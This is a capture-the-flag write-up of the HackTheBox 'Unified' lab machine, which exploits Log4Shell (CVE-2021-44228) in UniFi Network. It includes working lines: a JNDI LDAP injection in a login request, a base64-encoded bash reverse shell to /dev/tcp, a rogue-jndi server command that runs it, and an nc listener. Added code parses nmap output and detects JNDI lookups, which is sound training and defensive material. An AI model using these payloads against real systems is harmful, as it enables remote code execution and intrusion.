HTB Unified Writeup

Task 1

Q:What ports are open?

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.248.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST
Nmap scan report for 10.129.248.11
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.90 seconds

A quick nmap scan gives the answer straight away!

A:22,6789,8080,8443
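As an added example (not part of the original writeup), here is a small parser for the nmap output above. It extracts the open ports that answer Task 1 and also lists the open ports whose service name nmap only guessed (the trailing `?`) or whose version probe returned nothing, which are the ones worth checking by hand. Note that 8443 is not flagged: nmap matched a misleading Nagios fingerprint there, which is why the writeup still opens that port in a browser rather than trusting the version column.

```python
import re

# Constructed sample: the nmap -sV output quoted in Task 1 above.
NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST
Nmap scan report for 10.129.248.11
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version text>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Parse nmap's normal (non-XML) output into one dict per port line."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        entries.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            # nmap appends '?' when the service name is only a guess from
            # the port number rather than a matched fingerprint.
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": (version or "").strip(),
        })
    return entries


def open_ports(text):
    """Open ports in ascending order (Task 1 asks for exactly this list)."""
    return sorted(e["port"] for e in parse_nmap(text) if e["state"] == "open")


def needs_manual_check(text):
    """Open ports whose service was guessed or whose version probe found
    nothing; these are the ones to inspect by hand."""
    return [e["port"] for e in parse_nmap(text)
            if e["state"] == "open" and (e["guessed"] or not e["version"])]


if __name__ == "__main__":
    print("open:", ",".join(map(str, open_ports(NMAP_OUTPUT))))
    print("check by hand:", needs_manual_check(NMAP_OUTPUT))
```

For a real engagement the same parser runs over `nmap -oN` files; for anything scripted at scale, `-oX` with an XML parser is the more robust choice, since the normal-format columns are meant for humans.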

Task 2

Q:Name of the software that is running on the highest port?

nmap did not identify the service from the port, so let's open it in a browser and see.

Bad Request
This combination of host and port requires TLS.

It tells us TLS is required, so we access it over https instead.

This one can only be identified by eye and then searched for manually to find out what the software is.

A:UniFi Network

Task 3

Q:What is the version of the software that is running?

The version number is printed under the logo on the page.

A:6.4.54

Task 4

Q:What is the CVE for the identified vulnerability?

Searching for the software name plus the version number turns up a vulnerability: CVE-2021-44228.

A:cve-2021-44228

Task 5

Q:What is the version of Maven that we installed?

A:3.6.3

Task 6

Q:What protocol does JNDI leverage in the injection?

A:ldap

Task 7

Q:What tool do we use to intercept the traffic, indicating the attack was successful?

A:tcpdump

Task 8

Q:What port do we need to inspect intercepted traffic for?

A:389

Task 9

Q:What port is the MongoDB service running on?

A:27117

Task 10

Q:What is the default database name for UniFi applications?

A:ace

Task 11

Q:What is the function we use to enumerate users within the database in MongoDB?

A:db.admin.find()

Task 12

Q:What is the function to add data to the database in MongoDB?

A:db.admin.insert()

Task 13

Q:What is the function we use to update users within the database in MongoDB?

A:db.admin.update()

Task 14

Q:What is the password for the root user?

A:

Flag

Start with an nmap port scan and identify the service; this was already covered in the tasks above.

Once we know the CMS, look up its known vulnerabilities; the one we get is CVE-2021-44228.

We look up write-ups on this vulnerability and exploit it.

First, start capturing traffic: sudo tcpdump -i tun0

When logging in, intercept the request and put the log4j2 payload in the remember field.

POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.96.149:8443
Content-Length: 71
Te: trailers
Connection: close

{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}

Change the IP in the payload to the IP of your own interface; if the vulnerability is present, the target will connect back to it.

Forward the request and data appears in tcpdump, which means the target connected back. That confirms the Log4j vulnerability.
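The defender-side counterpart of the request above, added here as an example and not part of the original writeup: a scanner that splits a raw HTTP/1.1 request like the one just shown, walks the request line, every header value and every string in the JSON body, and flags a `${jndi:` lookup as high severity and any other `${...}` lookup as medium. The captured body is not even valid JSON (the lookup is unquoted), so the scanner deliberately falls back to inspecting the raw body when parsing fails instead of letting a malformed payload through unexamined. The two request samples are constructed from the writeup's own capture.

```python
import json
import re

# Constructed samples based on the intercepted login request quoted above:
# one carrying the JNDI lookup in the "remember" field, one benign.
CAPTURED_REQUEST = """POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Content-Type: application/json; charset=utf-8
Connection: close

{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}
"""

BENIGN_REQUEST = """POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
Content-Type: application/json; charset=utf-8

{"username":"admin","password":"123456","remember":true,"strict":true}
"""

# An explicit JNDI lookup is the CVE-2021-44228 trigger; any other ${...}
# lookup in untrusted input is still worth flagging, because vulnerable
# Log4j 2.x versions expand such strings when they log them.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def split_request(raw):
    """Split a raw HTTP/1.1 request into (request line, headers dict, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body.strip()


def iter_strings(obj):
    """Yield every string value in a decoded JSON document, at any depth."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def body_strings(body):
    """Strings to inspect in the body. A JSON parse failure falls back to
    scanning the raw body rather than silently passing it through."""
    try:
        return list(iter_strings(json.loads(body)))
    except ValueError:
        return [body]


def scan_request(raw):
    """Return (severity, location, value) findings for one request."""
    request_line, headers, body = split_request(raw)
    findings = []

    def check(where, value):
        if JNDI_LOOKUP.search(value):
            findings.append(("high", where, value))
        elif ANY_LOOKUP.search(value):
            findings.append(("medium", where, value))

    check("request-line", request_line)
    for name, value in headers.items():
        check("header:" + name, value)
    for s in body_strings(body):
        check("body", s)
    return findings


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, scan_request(req))
```

A hit from this scanner is an alerting signal, not the fix: the fix is upgrading Log4j to a release that no longer performs the lookup (2.17.1 or later on the 2.x line). The tcpdump check the writeup uses is the network-side version of the same detection: a vulnerable server opens an outbound LDAP connection (port 389) to whatever host the lookup names, so egress monitoring for unexpected LDAP from application servers catches exploitation even when the request itself was not inspected.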

Now we need to build a class package.

First, install Maven.

┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# apt install maven        

Once Maven is installed, download a ready-made exploit:
https://github.com/veracode-research/rogue-jndi
Enter the directory and run `mvn package` to build it.

When packaging finishes it reports `BUILD SUCCESS`.

Next, get the base64 encoding of the reverse shell payload:

┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# echo 'bash -c bash -i >&/dev/tcp/10.10.16.61/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==

Then start the rogue server:

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.61"

Listen on port 4444:

nc -lnvp 4444
